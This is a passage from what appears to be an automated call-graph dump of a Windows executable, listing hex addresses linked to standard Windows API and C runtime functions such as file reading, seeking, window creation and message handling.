82577->82468 82579 42ccf4 _memset 82578->82579 82580 40f3c9 82578->82580 82582 42cd05 GetOpenFileNameW 82579->82582 83309 40ffb0 76 API calls ctype 82580->83309 82582->82580 82584 40d732 82582->82584 82583 40f3d2 83310 410130 SHGetMalloc 82583->83310 82584->82476 82584->82478 82586 40f3d9 83315 410020 88 API calls __wcsicoll 82586->83315 82588 40f3e7 83316 40f400 82588->83316 82591 42b9d3 82590->82591 82592 41025a LoadImageW RegisterClassExW 82590->82592 83363 443e8f EnumResourceNamesW LoadImageW 82591->83363 83362 4102f0 7 API calls 82592->83362 82595 40d790 82597 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 82595->82597 82596 42b9da 82597->82490 82598->82478 82599->82498 82600->82491 82601->82478 82602->82484 82603->82494 82604->82497 82605->82501 82606->82510 82607->82512 82650 40f5e0 82608->82650 82610 40ffa6 82610->82514 82613 42b6d8 82614 42b6e6 82613->82614 82706 434fe1 82613->82706 82616 413a88 __woutput_l 67 API calls 82614->82616 82617 42b6f5 82616->82617 82618 434fe1 106 API calls 82617->82618 82619 42b702 82618->82619 82619->82514 82620->82516 82621->82518 82622->82520 82623->82524 82624->82526 82625->82528 82626->82530 82628 41171a 75 API calls 82627->82628 82629 40c088 82628->82629 82630 41171a 75 API calls 82629->82630 82631 402061 82630->82631 82632 401a70 75 API calls 82631->82632 82632->82534 82633->82536 82634->82542 82635->82547 82636->82552 82637->82563 82638->82569 82639->82565 82640->82568 82641->82573 82642->82573 82643->82573 82644->82541 82645->82546 82646->82553 82647->82555 82648->82560 82649->82573 82710 40f580 82650->82710 82652 40f5f8 _strcat ctype 82718 40f6d0 82652->82718 82654 40f628 82654->82654 82722 414e06 82654->82722 82657 42b2ee 82747 4151b0 82657->82747 82659 40f679 82659->82657 82660 40f681 82659->82660 82734 414e94 82660->82734 82664 40f68b 82664->82610 82669 452574 82664->82669 82666 42b31d 82753 415484 82666->82753 82668 42b33d 82670 41557c _fseek 105 API calls 82669->82670 82671 4525df 82670->82671 83254 4523ce 82671->83254 82674 4525fc 82674->82613 82675 4151b0 __fread_nolock 81 API calls 82676 45261d 82675->82676 82677 4151b0 __fread_nolock 81 API calls 82676->82677 82678 45262e 82677->82678 82679 4151b0 __fread_nolock 81 API calls 82678->82679 82680 452649 82679->82680 82681 4151b0 __fread_nolock 81 API calls 82680->82681 82682 452666 82681->82682 82683 41557c _fseek 105 API calls 82682->82683 82684 452682 82683->82684 82685 4138ba _malloc 67 API calls 82684->82685 82686 45268e 82685->82686 82687 4138ba _malloc 67 API calls 82686->82687 82688 45269b 82687->82688 82689 4151b0 __fread_nolock 81 API calls 82688->82689 82690 4526ac 82689->82690 82691 44afdc GetSystemTimeAsFileTime 82690->82691 82692 4526bf 82691->82692 82693 4526d5 82692->82693 82694 4526fd 82692->82694 82695 413a88 __woutput_l 67 API calls 82693->82695 82696 452704 82694->82696 82697 45275b 82694->82697 82698 4526df 82695->82698 83260 44b195 82696->83260 82700 413a88 __woutput_l 67 API calls 82697->82700 82702 413a88 __woutput_l 67 API calls 82698->82702 82701 452759 82700->82701 82701->82613 82704 4526e8 82702->82704 82703 452753 82705 413a88 __woutput_l 67 API calls 82703->82705 82704->82613 82705->82701 82707 434ff1 82706->82707 82708 434feb 82706->82708 82707->82614 82709 414e94 __fcloseall 106 API calls 82708->82709 82709->82707 82711 429440 82710->82711 82712 40f589 _wcslen 82710->82712 82713 40f58f WideCharToMultiByte 82712->82713 82714 40f5d8 82713->82714 82715 40f5ad 82713->82715 82714->82652 82716 41171a 75 API calls 82715->82716 82717 40f5bb WideCharToMultiByte 82716->82717 82717->82652 82719 40f6dd _strlen 82718->82719 82766 40f790 82719->82766 82785 414d40 82722->82785 82724 40f666 82724->82657 82725 40f450 82724->82725 82729 40f45a _strcat _memcpy_s __write_nolock 82725->82729 82726 4151b0 __fread_nolock 81 API calls 82726->82729 82727 40f531 82727->82659 82729->82726 82729->82727 82733 42936d 82729->82733 82868 41557c 82729->82868 82730 41557c _fseek 105 API calls 82731 429394 82730->82731 82732 4151b0 __fread_nolock 81 API calls 82731->82732 82732->82727 82733->82730 82735 414ea0 __close 82734->82735 82736 414ed1 82735->82736 82737 414eb4 82735->82737 82739 415965 __lock_file 68 API calls 82736->82739 82743 414ec9 __close 82736->82743 83007 417f23 67 API calls __getptd_noexit 82737->83007 82741 414ee9 82739->82741 82740 414eb9 83008 417ebb 6 API calls 2 library calls 82740->83008 82991 414e1d 82741->82991 82743->82664 83076 41511a 82747->83076 82749 4151c8 82750 44afdc 82749->82750 83247 4431e0 82750->83247 82752 44affd 82752->82666 82754 415490 __close 82753->82754 82755 4154bb 82754->82755 82756 41549e 82754->82756 82758 415965 __lock_file 68 API calls 82755->82758 83251 417f23 67 API calls __getptd_noexit 82756->83251 82760 4154c3 82758->82760 82759 4154a3 83252 417ebb 6 API calls 2 library calls 82759->83252 82762 4152e7 __ftell_nolock 71 API calls 82760->82762 82763 4154cf 82762->82763 83253 4154e8 LeaveCriticalSection LeaveCriticalSection _fseek 82763->83253 82765 4154b3 __close 82765->82668 82768 40f7ae _memset 82766->82768 82769 40f6f8 82768->82769 82770 415258 82768->82770 82769->82654 82771 415285 82770->82771 82772 415268 82770->82772 82771->82772 82773 41528c 82771->82773 82781 417f23 67 API calls __getptd_noexit 82772->82781 82783 41c551 103 API calls 11 library calls 82773->82783 82776 41526d 82782 417ebb 6 API calls 2 library calls 82776->82782 82777 4152b2 82779 41527d 82777->82779 82784 4191c9 101 API calls 6 library calls 82777->82784 82779->82768 82781->82776 82783->82777 82784->82779 82787 414d4c __close 82785->82787 82786 414d5f 82837 417f23 67 API calls __getptd_noexit 82786->82837 82787->82786 82789 414d95 82787->82789 82804 41e28c 82789->82804 82790 414d64 82838 417ebb 6 API calls 2 library calls 82790->82838 82793 414d9a 82794 414da1 82793->82794 82795 414dae 82793->82795 82839 417f23 67 API calls __getptd_noexit 82794->82839 82797 414dd6 82795->82797 82798 414db6 82795->82798 82822 41dfd8 82797->82822 82840 417f23 67 API calls __getptd_noexit 82798->82840 82802 414d74 __close @_EH4_CallFilterFunc@8 82802->82724 82805 41e298 __close 82804->82805 82806 418407 __lock 67 API calls 82805->82806 82819 41e2a6 82806->82819 82807 41e31b 82842 41e3bb 82807->82842 82808 41e322 82809 416fb6 __malloc_crt 67 API calls 82808->82809 82811 41e32c 82809->82811 82811->82807 82847 4189e6 InitializeCriticalSectionAndSpinCount __close 82811->82847 82812 41e3b0 __close 82812->82793 82814 418344 __mtinitlocknum 67 API calls 82814->82819 82816 41e351 82817 41e35c 82816->82817 82818 41e36f EnterCriticalSection 82816->82818 82820 413a88 __woutput_l 67 API calls 82817->82820 82818->82807 82819->82807 82819->82808 82819->82814 82845 4159a6 68 API calls __lock 82819->82845 82846 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 82819->82846 82820->82807 82831 41dffb __wopenfile 82822->82831 82823 41e015 82852 417f23 67 API calls __getptd_noexit 82823->82852 82824 41e1e9 82824->82823 82827 41e247 82824->82827 82826 41e01a 82853 417ebb 6 API calls 2 library calls 82826->82853 82849 425db0 82827->82849 82831->82823 82831->82824 82831->82831 82854 4136bc 79 API calls 2 library calls 82831->82854 82833 41e1e2 82833->82824 82855 4136bc 79 API calls 2 library calls 82833->82855 82835 41e201 82835->82824 82856 4136bc 79 API calls 2 library calls 82835->82856 82837->82790 82839->82802 82840->82802 82841 414dfc LeaveCriticalSection LeaveCriticalSection _fseek 82841->82802 82848 41832d LeaveCriticalSection 82842->82848 82844 41e3c2 82844->82812 82845->82819 82846->82819 82847->82816 82848->82844 82857 425ce4 82849->82857 82851 414de1 82851->82841 82852->82826 82854->82833 82855->82835 82856->82824 82858 425cf0 __close 82857->82858 82859 425d03 82858->82859 82862 425d41 82858->82862 82860 417f23 __woutput_l 67 API calls 82859->82860 82861 425d08 82860->82861 82863 417ebb __woutput_l 6 API calls 82861->82863 82864 4255c4 __tsopen_nolock 132 API calls 82862->82864 82867 425d17 __close 82863->82867 82865 425d5b 82864->82865 82866 425d82 __sopen_helper LeaveCriticalSection 82865->82866 82866->82867 82867->82851 82872 415588 __close 82868->82872 82869 415596 82899 417f23 67 API calls __getptd_noexit 82869->82899 82871 4155c4 82881 415965 82871->82881 82872->82869 82872->82871 82873 41559b 82900 417ebb 6 API calls 2 library calls 82873->82900 82880 4155ab __close 82880->82729 82882 415977 82881->82882 82883 415999 EnterCriticalSection 82881->82883 82882->82883 82884 41597f 82882->82884 82885 4155cc 82883->82885 82886 418407 __lock 67 API calls 82884->82886 82887 4154f2 82885->82887 82886->82885 82888 415512 82887->82888 82889 415502 82887->82889 82891 415524 82888->82891 82902 4152e7 82888->82902 82956 417f23 67 API calls __getptd_noexit 82889->82956 82919 41486c 82891->82919 82898 415507 82901 4155f7 LeaveCriticalSection LeaveCriticalSection _fseek 82898->82901 82899->82873 82901->82880 82903 41531a 82902->82903 82904 4152fa 82902->82904 82906 41453a __fileno 67 API calls 82903->82906 82957 417f23 67 API calls __getptd_noexit 82904->82957 82908 415320 82906->82908 82907 4152ff 82958 417ebb 6 API calls 2 library calls 82907->82958 82910 41efd4 __locking 71 API calls 82908->82910 82911 415335 82910->82911 82912 4153a9 82911->82912 82914 415364 82911->82914 82918 41530f 82911->82918 82959 417f23 67 API calls __getptd_noexit 82912->82959 82915 41efd4 __locking 71 API calls 82914->82915 82914->82918 82916 415404 82915->82916 82917 41efd4 __locking 71 API calls 82916->82917 82916->82918 82917->82918 82918->82891 82920 4148a7 82919->82920 82921 414885 82919->82921 82925 41453a 82920->82925 82921->82920 82922 41453a __fileno 67 API calls 82921->82922 82923 4148a0 82922->82923 82960 41c3cf 101 API calls 5 library calls 82923->82960 82926 414549 82925->82926 82930 41455e 82925->82930 82961 417f23 67 API calls __getptd_noexit 82926->82961 82928 41454e 82962 417ebb 6 API calls 2 library calls 82928->82962 82931 41efd4 82930->82931 82932 41efe0 __close 82931->82932 82933 41f003 82932->82933 82934 41efe8 82932->82934 82935 41f011 82933->82935 82940 41f052 82933->82940 82983 417f36 67 API calls __getptd_noexit 82934->82983 82985 417f36 67 API calls __getptd_noexit 82935->82985 82938 41efed 82984 417f23 67 API calls __getptd_noexit 82938->82984 82939 41f016 82986 417f23 67 API calls __getptd_noexit 82939->82986 82963 41ba3b 82940->82963 82944 41f01d 82987 417ebb 6 API calls 2 library calls 82944->82987 82945 41f058 82947 41f065 82945->82947 82948 41f07b 82945->82948 82973 41ef5f 82947->82973 82988 417f23 67 API calls __getptd_noexit 82948->82988 82951 41f073 82990 41f0a6 LeaveCriticalSection __unlock_fhandle 82951->82990 82952 41f080 82989 417f36 67 API calls __getptd_noexit 82952->82989 82953 41eff5 __close 82953->82898 82956->82898 82957->82907 82959->82918 82960->82920 82961->82928 82964 41ba47 __close 82963->82964 82965 41baa2 82964->82965 82968 418407 __lock 67 API calls 82964->82968 82966 41bac4 __close 82965->82966 82967 41baa7 EnterCriticalSection 82965->82967 82966->82945 82967->82966 82969 41ba73 82968->82969 82970 41ba8a 82969->82970 82972 4189e6 __alloc_osfhnd InitializeCriticalSectionAndSpinCount 82969->82972 82971 41bad2 ___lock_fhandle LeaveCriticalSection 82970->82971 82971->82965 82972->82970 82974 41b9c4 __close_nolock 67 API calls 82973->82974 82975 41ef6e 82974->82975 82976 41ef84 SetFilePointer 82975->82976 82977 41ef74 82975->82977 82979 41efa3 82976->82979 82980 41ef9b GetLastError 82976->82980 82978 417f23 __woutput_l 67 API calls 82977->82978 82981 41ef79 82978->82981 82979->82981 82982 417f49 __dosmaperr 67 API calls 82979->82982 82980->82979 82981->82951 82982->82981 82983->82938 82984->82953 82985->82939 82986->82944 82988->82952 82989->82951 82990->82953 82992 414e31 82991->82992 82993 414e4d 82991->82993 83037 417f23 67 API calls __getptd_noexit 82992->83037 82996 41486c __flush 101 API calls 82993->82996 82999 414e46 82993->82999 82995 414e36 83038 417ebb 6 API calls 2 library calls 82995->83038 82998 414e59 82996->82998 83010 41e680 82998->83010 83009 414f08 LeaveCriticalSection LeaveCriticalSection _fseek 82999->83009 83002 41453a __fileno 67 API calls 83003 414e67 83002->83003 83014 41e5b3 83003->83014 83005 414e6d 83005->82999 83006 413a88 __woutput_l 67 API calls 83005->83006 83006->82999 83007->82740 83009->82743 83011 41e690 83010->83011 83012 414e61 83010->83012 83011->83012 83013 413a88 __woutput_l 67 API calls 83011->83013 83012->83002 83013->83012 83015 41e5bf __close 83014->83015 83016 41e5e2 83015->83016 83017 41e5c7 83015->83017 83019 41e5f0 83016->83019 83022 41e631 83016->83022 83054 417f36 67 API calls __getptd_noexit 83017->83054 83056 417f36 67 API calls __getptd_noexit 83019->83056 83020 41e5cc 83055 417f23 67 API calls __getptd_noexit 83020->83055 83026 41ba3b ___lock_fhandle 68 API calls 83022->83026 83024 41e5f5 83057 417f23 67 API calls __getptd_noexit 83024->83057 83029 41e637 83026->83029 83027 41e5d4 __close 83027->83005 83028 41e5fc 83058 417ebb 6 API calls 2 library calls 83028->83058 83031 41e652 83029->83031 83032 41e644 83029->83032 83059 417f23 67 API calls __getptd_noexit 83031->83059 83039 41e517 83032->83039 83035 41e64c 83060 41e676 LeaveCriticalSection __unlock_fhandle 83035->83060 83037->82995 83061 41b9c4 83039->83061 83041 41e57d 83074 41b93e 68 API calls 2 library calls 83041->83074 83043 41e527 83043->83041 83044 41e55b 83043->83044 83046 41b9c4 __close_nolock 67 API calls 83043->83046 83044->83041 83047 41b9c4 __close_nolock 67 API calls 83044->83047 83045 41e585 83048 41e5a7 83045->83048 83075 417f49 67 API calls 3 library calls 83045->83075 83049 41e552 83046->83049 83050 41e567 CloseHandle 83047->83050 83048->83035 83052 41b9c4 __close_nolock 67 API calls 83049->83052 83050->83041 83053 41e573 GetLastError 83050->83053 83052->83044 83053->83041 83054->83020 83055->83027 83056->83024 83057->83028 83059->83035 83060->83027 83062 41b9d1 83061->83062 83063 41b9e9 83061->83063 83064 417f36 __close 67 API calls 83062->83064 83065 417f36 __close 67 API calls 83063->83065 83070 41ba2e 83063->83070 83066 41b9d6 83064->83066 83067 41ba17 83065->83067 83068 417f23 __woutput_l 67 API calls 83066->83068 83069 417f23 __woutput_l 67 API calls 83067->83069 83071 41b9de 83068->83071 83072 41ba1e 83069->83072 83070->83043 83071->83043 83073 417ebb __woutput_l 6 API calls 83072->83073 83073->83070 83074->83045 83075->83048 83077 415126 __close 83076->83077 83078 41513a _memset 83077->83078 83079 41516f 83077->83079 83088 415164 __close 83077->83088 83105 417f23 67 API calls __getptd_noexit 83078->83105 83080 415965 __lock_file 68 API calls 83079->83080 83082 415177 83080->83082 83089 414f10 83082->83089 83083 415154 83106 417ebb 6 API calls 2 library calls 83083->83106 83088->82749 83093 414f2e _memset 83089->83093 83095 414f4c 83089->83095 83090 414f37 83158 417f23 67 API calls __getptd_noexit 83090->83158 83092 414f3c 83159 417ebb 6 API calls 2 library calls 83092->83159 83093->83090 83093->83095 83097 414f8b 83093->83097 83107 4151a6 LeaveCriticalSection LeaveCriticalSection _fseek 83095->83107 83097->83095 83098 4150d5 _memset 83097->83098 83099 4150a9 _memset 83097->83099 83100 41453a __fileno 67 API calls 83097->83100 83108 41ed9e 83097->83108 83138 41e6b1 83097->83138 83160 41ee9b 67 API calls 3 library calls 83097->83160 83162 417f23 67 API calls __getptd_noexit 83098->83162 83161 417f23 67 API calls __getptd_noexit 83099->83161 83100->83097 83105->83083 83107->83088 83109 41edaa __close 83108->83109 83110 41edb2 83109->83110 83111 41edcd 83109->83111 83232 417f36 67 API calls __getptd_noexit 83110->83232 83113 41eddb 83111->83113 83116 41ee1c 83111->83116 83234 417f36 67 API calls __getptd_noexit 83113->83234 83114 41edb7 83233 417f23 67 API calls __getptd_noexit 83114->83233 83119 41ee29 83116->83119 83120 41ee3d 83116->83120 83118 41ede0 83235 417f23 67 API calls __getptd_noexit 83118->83235 83237 417f36 67 API calls __getptd_noexit 83119->83237 83123 41ba3b ___lock_fhandle 68 API calls 83120->83123 83126 41ee43 83123->83126 83124 41ede7 83236 417ebb 6 API calls 2 library calls 83124->83236 83125 41ee2e 83238 417f23 67 API calls __getptd_noexit 83125->83238 83130 41ee50 83126->83130 83131 41ee66 83126->83131 83129 41edbf __close 83129->83097 83163 41e7dc 83130->83163 83239 417f23 67 API calls __getptd_noexit 83131->83239 83134 41ee6b 83240 417f36 67 API calls __getptd_noexit 83134->83240 83135 41ee5e 83241 41ee91 LeaveCriticalSection __unlock_fhandle 83135->83241 83139 41e6c1 83138->83139 83142 41e6de 83138->83142 83245 417f23 67 API calls __getptd_noexit 83139->83245 83141 41e6c6 83246 417ebb 6 API calls 2 library calls 83141->83246 83144 41e713 83142->83144 83150 41e6d6 83142->83150 83242 423600 83142->83242 83146 41453a __fileno 67 API calls 83144->83146 83147 41e727 83146->83147 83148 41ed9e __read 79 API calls 83147->83148 83149 41e72e 83148->83149 83149->83150 83151 41453a __fileno 67 API calls 83149->83151 83150->83097 83152 41e751 83151->83152 83152->83150 83153 41453a __fileno 67 API calls 83152->83153 83154 41e75d 83153->83154 83154->83150 83155 41453a __fileno 67 API calls 83154->83155 83156 41e769 83155->83156 83157 41453a __fileno 67 API calls 83156->83157 83157->83150 83158->83092 83160->83097 83161->83092 83162->83092 83164 41e813 83163->83164 83165 41e7f8 83163->83165 83167 41e822 83164->83167 83169 41e849 83164->83169 83166 417f36 __close 67 API calls 83165->83166 83168 41e7fd 83166->83168 83170 417f36 __close 67 API calls 83167->83170 83172 417f23 __woutput_l 67 API calls 83168->83172 83171 41e868 83169->83171 83186 41e87c 83169->83186 83173 41e827 83170->83173 83174 417f36 __close 67 API calls 83171->83174 83183 41e805 83172->83183 83176 417f23 __woutput_l 67 API calls 83173->83176 83178 41e86d 83174->83178 83175 41e8d4 83177 417f36 __close 67 API calls 83175->83177 83179 41e82e 83176->83179 83181 41e8d9 83177->83181 83182 417f23 __woutput_l 67 API calls 83178->83182 83180 417ebb __woutput_l 6 API calls 83179->83180 83180->83183 83184 417f23 __woutput_l 67 API calls 83181->83184 83185 41e874 83182->83185 83183->83135 83184->83185 83189 417ebb __woutput_l 6 API calls 83185->83189 83186->83175 83186->83183 83187 41e8b0 83186->83187 83188 41e8f5 83186->83188 83187->83175 83194 41e8bb ReadFile 83187->83194 83191 416fb6 __malloc_crt 67 API calls 83188->83191 83189->83183 83195 41e90b 83191->83195 83192 41ed62 GetLastError 83196 41ebe8 83192->83196 83197 41ed6f 83192->83197 83193 41e9e7 83193->83192 83201 41e9fb 83193->83201 83194->83192 83194->83193 83198 41e931 83195->83198 83199 41e913 83195->83199 83205 417f49 __dosmaperr 67 API calls 83196->83205 83211 41eb6d 83196->83211 83203 417f23 __woutput_l 67 API calls 83197->83203 83202 423462 __lseeki64_nolock 69 API calls 83198->83202 83200 417f23 __woutput_l 67 API calls 83199->83200 83204 41e918 83200->83204 83201->83211 83212 41ea17 83201->83212 83215 41ec2d 83201->83215 83206 41e93d 83202->83206 83207 41ed74 83203->83207 83209 417f36 __close 67 API calls 83204->83209 83205->83211 83206->83194 83208 417f36 __close 67 API calls 83207->83208 83208->83211 83209->83183 83210 413a88 __woutput_l 67 API calls 83210->83183 83211->83183 83211->83210 83213 41ea7d ReadFile 83212->83213 83226 41eafa 83212->83226 83217 41ea9b GetLastError 83213->83217 83221 41eaa5 83213->83221 83214 41eca5 ReadFile 83218 41ecc4 GetLastError 83214->83218 83219 41ecce 83214->83219 83215->83211 83215->83214 83216 41eb32 83220 41ebbe MultiByteToWideChar 83216->83220 83217->83212 83217->83221 83218->83215 83218->83219 83219->83215 83227 423462 __lseeki64_nolock 69 API calls 83219->83227 83220->83211 83222 41ebe2 GetLastError 83220->83222 83221->83212 83229 423462 __lseeki64_nolock 69 API calls 83221->83229 83222->83196 83223 41eb75 83223->83216 83228 41ebac 83223->83228 83224 41eb68 83225 417f23 __woutput_l 67 API calls 83224->83225 83225->83211 83226->83211 83226->83216 83226->83223 83226->83224 83227->83219 83230 423462 __lseeki64_nolock 69 API calls 83228->83230 83229->83221 83231 41ebbb 83230->83231 83231->83220 83232->83114 83233->83129 83234->83118 83235->83124 83237->83125 83238->83124 83239->83134 83240->83135 83241->83129 83243 416fb6 __malloc_crt 67 API calls 83242->83243 83244 423615 83243->83244 83244->83144 83245->83141 83250 414cef GetSystemTimeAsFileTime __aulldiv 83247->83250 83249 4431ef 83249->82752 83250->83249 83251->82759 83253->82765 83259 4523e1 _wcscpy 83254->83259 83255 4151b0 81 API calls __fread_nolock 83255->83259 83256 44afdc GetSystemTimeAsFileTime 83256->83259 83257 452553 83257->82674 83257->82675 83258 41557c 105 API calls _fseek 83258->83259 83259->83255 83259->83256 83259->83257 83259->83258 83261 44b1a6 83260->83261 83264 44b1b4 83260->83264 83262 414e06 138 API calls 83261->83262 83262->83264 83263 44b1ca 83295 4352d1 81 API calls 2 library calls 83263->83295 83264->83263 83265 414e06 138 API calls 83264->83265 83266 44b1c2 83264->83266 83267 44b2c1 83265->83267 83266->82703 83267->83263 83269 44b2cf 83267->83269 83271 44b2dc 83269->83271 83274 414e94 __fcloseall 106 API calls 83269->83274 83270 44b20d 83272 44b211 83270->83272 83273 44b23b 83270->83273 83271->82703 83276 44b21e 83272->83276 83279 414e94 __fcloseall 106 API calls 83272->83279 83296 43526e 83273->83296 83274->83271 83277 44b22e 83276->83277 83280 414e94 __fcloseall 106 API calls 83276->83280 83277->82703 83278 44b242 83281 44b270 83278->83281 83282 44b248 83278->83282 83279->83276 83280->83277 83306 44b0af 111 API calls 83281->83306 83284 44b255 83282->83284 83286 414e94 __fcloseall 106 API calls 83282->83286 83287 44b265 83284->83287 83289 414e94 __fcloseall 106 API calls 83284->83289 83285 44b276 83307 43522c 67 API calls __woutput_l 83285->83307 83286->83284 83287->82703 83289->83287 83290 44b27c 83291 44b289 83290->83291 83292 414e94 __fcloseall 106 API calls 83290->83292 83293 44b299 83291->83293 83294 414e94 __fcloseall 106 API calls 83291->83294 83292->83291 83293->82703 83294->83293 83295->83270 83297 4138ba _malloc 67 API calls 83296->83297 83298 43527d 83297->83298 83299 4138ba _malloc 67 API calls 83298->83299 83300 43528d 83299->83300 83301 4138ba _malloc 67 API calls 83300->83301 83302 43529d 83301->83302 83304 4352bc 83302->83304 83308 43522c 67 API calls __woutput_l 83302->83308 83304->83278 83305 4352c8 83305->83278 83306->83285 83307->83290 83308->83305 83309->82583 83311 410148 SHGetDesktopFolder 83310->83311 83314 4101a3 _wcscpy 83310->83314 83312 41015a _wcscpy 83311->83312 83311->83314 83313 41018a SHGetPathFromIDListW 83312->83313 83312->83314 83313->83314 83314->82586 83315->82588 83317 40f5e0 152 API calls 83316->83317 83318 40f417 83317->83318 83319 42ca37 83318->83319 83320 40f42c 83318->83320 83321 42ca1f 83318->83321 83322 452574 140 API calls 83319->83322 83357 4037e0 139 API calls 7 library calls 83320->83357 83358 43717f 110 API calls _printf 83321->83358 83323 42ca50 83322->83323 83326 42ca76 83323->83326 83327 42ca54 83323->83327 83331 41171a 75 API calls 83326->83331 83330 434fe1 106 API calls 83327->83330 83328 40f446 83328->82584 83329 42ca2d 83329->83319 83332 42ca5e 83330->83332 83346 42cacc ctype 83331->83346 83359 43717f 110 API calls _printf 83332->83359 83334 42ca6c 83334->83326 83335 42ccc3 83336 413a88 __woutput_l 67 API calls 83335->83336 83337 42cccd 83336->83337 83338 434fe1 106 API calls 83337->83338 83339 42ccda 83338->83339 83343 401b70 75 API calls 83343->83346 83346->83335 83346->83343 83347 445051 83346->83347 83350 402cc0 75 API calls 2 library calls 83346->83350 83351 4026a0 83346->83351 83360 44c80c 87 API calls 3 library calls 83346->83360 83361 44b408 75 API calls 83346->83361 83348 41171a 75 API calls 83347->83348 83349 445080 _memcpy_s 83348->83349 83349->83346 83349->83349 83350->83346 83352 4026af 83351->83352 83354 40276b 83351->83354 83353 41171a 75 API calls 83352->83353 83352->83354 83355 4026ee ctype 83352->83355 83353->83355 83354->83346 83355->83354 83356 41171a 75 API calls 83355->83356 83356->83355 83357->83328 83358->83329 83359->83334 83360->83346 83361->83346 83362->82595 83363->82596 83364 431914 83365 431920 83364->83365 83366 431928 83365->83366 83367 43193d 83365->83367 83628 45e62e 116 API calls 3 library calls 83366->83628 83629 47f2b4 174 API calls 83367->83629 83370 43194a 83407 4095b0 ctype 83370->83407 83630 45e62e 116 API calls 3 library calls 83370->83630 83371 409708 83374 4097af 83374->83371 83615 40d590 VariantClear 83374->83615 83376 4315b8 WaitForSingleObject 83378 4315d6 GetExitCodeProcess CloseHandle 83376->83378 83376->83407 83377 431623 Sleep 83380 43163b timeGetTime 83377->83380 83402 409894 83377->83402 83619 40d590 VariantClear 83378->83619 83380->83402 83383 40986e Sleep 83386 409880 timeGetTime 83383->83386 83383->83402 83386->83402 83387 4098f1 TranslateMessage DispatchMessageW 83387->83407 83388 431673 CloseHandle 83388->83402 83389 43170c GetExitCodeProcess CloseHandle 83389->83402 83390 40d590 VariantClear 83390->83402 83391 46dd22 133 API calls 83391->83402 83393 46e641 134 API calls 83393->83402 83396 431781 Sleep 83396->83407 83399 45e62e 116 API calls 83399->83407 83402->83388 83402->83389 83402->83390 83402->83391 83402->83393 83402->83396 83406 4092c0 VariantClear 83402->83406 83402->83407 83616 447e59 75 API calls 83402->83616 83617 453b07 77 API calls 83402->83617 83618 4646a2 76 API calls 83402->83618 83620 444233 88 API calls _wcslen 83402->83620 83621 457509 VariantClear 83402->83621 83622 404120 83402->83622 83626 4717e3 VariantClear 83402->83626 83627 436272 6 API calls 83402->83627 83405 4319c9 VariantClear 83405->83407 83406->83402 83407->83371 83407->83374 83407->83376 83407->83377 83407->83383 83407->83387 83407->83399 83407->83402 83407->83405 83408 4092c0 VariantClear 83407->83408 83410 40b380 83407->83410 83434 409340 83407->83434 83467 409030 83407->83467 83481 40d300 83407->83481 83486 40d320 83407->83486 83492 409a40 83407->83492 83631 40e380 VariantClear ctype 83407->83631 83408->83407 83411 40b3a5 83410->83411 83412 40b53d 83410->83412 83413 430a99 83411->83413 83419 40b3b6 83411->83419 83632 45e62e 116 API calls 3 library calls 83412->83632 83633 45e62e 116 API calls 3 library calls 83413->83633 83416 40b528 83416->83407 83417 430aae 83421 4092c0 VariantClear 83417->83421 83419->83417 83422 40b3f2 83419->83422 83430 40b4fd ctype 83419->83430 83420 430dc9 83420->83420 83421->83416 83423 430ae9 VariantClear 83422->83423 83425 40b429 83422->83425 83431 40b476 ctype 83422->83431 83433 40b43b ctype 83423->83433 83424 40b4eb 83424->83430 83635 40e380 VariantClear ctype 83424->83635 83425->83433 83634 40e380 VariantClear ctype 83425->83634 83426 430d41 VariantClear 83426->83430 83428 41171a 75 API calls 83428->83431 83430->83416 83636 45e62e 116 API calls 3 library calls 83430->83636 83431->83424 83432 430d08 ctype 83431->83432 83432->83426 83432->83430 83433->83428 83433->83431 83435 409386 83434->83435 83437 409395 83434->83437 83637 4042f0 75 API calls __cinit 83435->83637 83439 42fba9 83437->83439 83441 42fc07 83437->83441 83443 42fc85 83437->83443 83445 42fd4f 83437->83445 83446 42fcd8 83437->83446 83448 42fd39 83437->83448 83455 40946f 83437->83455 83458 40947b 83437->83458 83460 4094c1 83437->83460 83463 4092c0 VariantClear 83437->83463 83466 409484 ctype 83437->83466 83640 453155 75 API calls 83437->83640 83642 40c620 118 API calls 83437->83642 83644 45e62e 116 API calls 3 library calls 83437->83644 83641 45e62e 116 API calls 3 library calls 83439->83641 83643 45e62e 116 API calls 3 library calls 83441->83643 83645 4781ae 140 API calls 83443->83645 83449 4092c0 VariantClear 83445->83449 83647 47f2b4 174 API calls 83446->83647 83649 45e62e 116 API calls 3 library calls 83448->83649 83449->83466 83451 42fc9c 83451->83466 83646 45e62e 116 API calls 3 library calls 83451->83646 83453 42fce9 83453->83466 83648 45e62e 116 API calls 3 library calls 83453->83648 83638 409210 VariantClear 83455->83638 83461 4092c0 VariantClear 83458->83461 83460->83466 83639 404260 76 API calls 83460->83639 83461->83466 83463->83437 83464 4094e1 83465 4092c0 VariantClear 83464->83465 83465->83466 83466->83407 83650 409110 117 API calls 83467->83650 83469 42ceb6 83660 410ae0 VariantClear ctype 83469->83660 83471 42cebf 83472 40906e 83472->83469 83473 42cea9 83472->83473 83475 4090a4 83472->83475 83659 45e62e 116 API calls 3 library calls 83473->83659 83651 404160 83475->83651 83478 4090f0 ctype 83478->83407 83479 4092c0 VariantClear 83480 4090be ctype 83479->83480 83480->83478 83480->83479 83482 40d30c 83481->83482 83484 4292e3 83481->83484 83482->83407 83483 429323 83483->83407 83484->83483 83485 4292fd TranslateAcceleratorW 83484->83485 83485->83482 83487 4296d0 83486->83487 83490 40d32f 83486->83490 83487->83407 83488 42972a IsDialogMessageW 83489 40d33c 83488->83489 83488->83490 83489->83407 83490->83488 83490->83489 83795 4340ec GetClassLongW 83490->83795 83493 409a66 _wcslen 83492->83493 83494 41171a 75 API calls 83493->83494 83554 40aade _memcpy_s ctype 83493->83554 83495 409a9c _memcpy_s 83494->83495 83496 41171a 75 API calls 83495->83496 83499 409abd 83496->83499 83498 42cee9 83500 41171a 75 API calls 83498->83500 83501 409aeb CharUpperBuffW 83499->83501 83503 409b09 ctype 83499->83503 83499->83554 83544 42cf10 _memcpy_s 83500->83544 83501->83503 83541 409b88 ctype 83503->83541 83798 47d10e 150 API calls 83503->83798 83505 42dbb9 83506 4092c0 VariantClear 83505->83506 83507 42e5e0 83506->83507 83830 410ae0 VariantClear ctype 83507->83830 83509 42e5f2 83510 409e4a 83512 41171a 75 API calls 83510->83512 83516 409ea4 83510->83516 83510->83544 83511 40aa5b 83513 41171a 75 API calls 83511->83513 83512->83516 83535 40aa81 _memcpy_s ctype 